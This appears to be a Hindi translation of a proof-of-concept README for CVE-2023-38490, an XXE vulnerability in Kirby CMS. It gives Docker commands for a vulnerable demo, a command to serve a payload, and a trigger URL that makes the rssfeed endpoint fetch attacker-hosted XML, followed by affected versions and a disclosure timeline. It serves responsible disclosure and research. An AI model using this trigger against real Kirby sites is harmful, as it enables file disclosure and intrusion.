Kirby XML External Entity (XXE) - CVE-2023-38490 शोषण
Kirby < 3.9.6 XML External Entity
CVE-2023-38490 / GHSA-q386-w6fg-gmgp के लिए शोषण।
शोषण प्रदर्शन
कमजोर डेमो ऐप को बनाएँ और चलाएँ:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
डेमो पेलोड को सर्व करें:
नोट: एक बाइंड पता चुनें जिसे डॉकर कंटेनर एक्सेस कर सके।
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
शोषण को ट्रिगर करें:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
यह कैसे और क्यों काम करता है?
कमजोर फंक्शन किर्बी कोर में मौजूद है लेकिन किर्बी कोर, किर्बी स्टार्टरकिट, या किर्बी प्लेनकिट में डिफ़ॉल्ट रूप से उपयोग नहीं किया जाता है। इसका मतलब है कि डिफ़ॉल्ट कॉन्फ़िगरेशन पर यह कमजोरी आपको प्रभावित नहीं करेगी लेकिन कस्टम डेवलपमेंट या प्रभावित टूलकिट का उपयोग करने वाले प्लगइन को स्थापित करने से इसे शामिल किया जा सकता है।
अधिक जानकारी के लिए, समर्पित लेख पढ़ें (EN 🇬🇧 या FR 🇫🇷)।
संदर्भ
- लक्ष्य सॉफ्टवेयर: Kirby
- होमपेज/विक्रेता: https://getkirby.com/
- स्रोत कोड:
- कमजोर संस्करण:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- पैच किए गए संस्करण:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- पैच:
- सलाहकार:
समयरेखा
- सप्ताह 24 - सोम, 12 जून 2023: अलेक्जेंड्रे ज़ैनी (@noraj) द्वारा कमजोरी की खोज, ACCEIS में प्रवेश परीक्षण इंजीनियर।
- सप्ताह 24 - मंगल, 13 जून 2023: अलेक्जेंड्रे ज़ैनी द्वारा संपादक (किर्बी) को कमजोरी की रिपोर्ट
- सप्ताह 24 - बुध, 14 जून 2023: अलेक्जेंड्रे ज़ैनी द्वारा संपादक (किर्बी) के साथ प्रूफ ऑफ कॉन्सेप्ट साझा किया गया
- सप्ताह 24 - बुध, 14 जून 2023: getkirby.com पर RFC 9116 security.txt जोड़ा गया
- सप्ताह 24 - गुरु, 15 जून 2023: संपादक (किर्बी) द्वारा कमजोरी की पुष्टि
- सप्ताह 24 - गुरु, 15 जून 2023: फिक्स और पैच की रिलीज़ की योजना बनाई गई
- सप्ताह 26 - गुरु, 29 जून 2023: पैट्रिक फाल्ब (@dapatrese) द्वारा FORMER 03 में स्वतंत्र रूप से कमजोरी की खोज
- सप्ताह 28 - रवि, 16 जुलाई 2023: एक निजी GitHub सलाह का निर्माण
- सप्ताह 29 - रवि, 23 जुलाई 2023: CVE ID का अनुरोध किया गया
- सप्ताह 29 - रवि, 23 जुलाई 2023: संपादक (किर्बी) द्वारा कमजोरी का पैच किया गया
- सप्ताह 30 - सोम, 24 जुलाई 2023: अलेक्जेंड्रे ज़ैनी को संपादक (किर्बी) द्वारा निजी सलाह में आमंत्रित किया गया
- सप्ताह 30 - सोम, 24 जुलाई 2023: अलेक्जेंड्रे ज़ैनी द्वारा एक कमजोर डेमो डॉकर कंटेनर की तैयारी
- सप्ताह 30 - सोम, 24 जुलाई 2023: CVE ID CVE-2023-38490 पंजीकृत (आरक्षित) किया गया
- सप्ताह 30 - गुरु, 27 जुलाई 2023: गिटहब सलाह और पैच का सार्वजनिक रिलीज़
अस्वीकरण
ACCEIS किसी भी अवैध गतिविधि को बढ़ावा या प्रोत्साहित नहीं करता है, इस रिपॉजिटरी द्वारा प्रदान की गई सभी सामग्री केवल अनुसंधान, शैक्षिक और खतरे का पता लगाने के उद्देश्य के लिए है।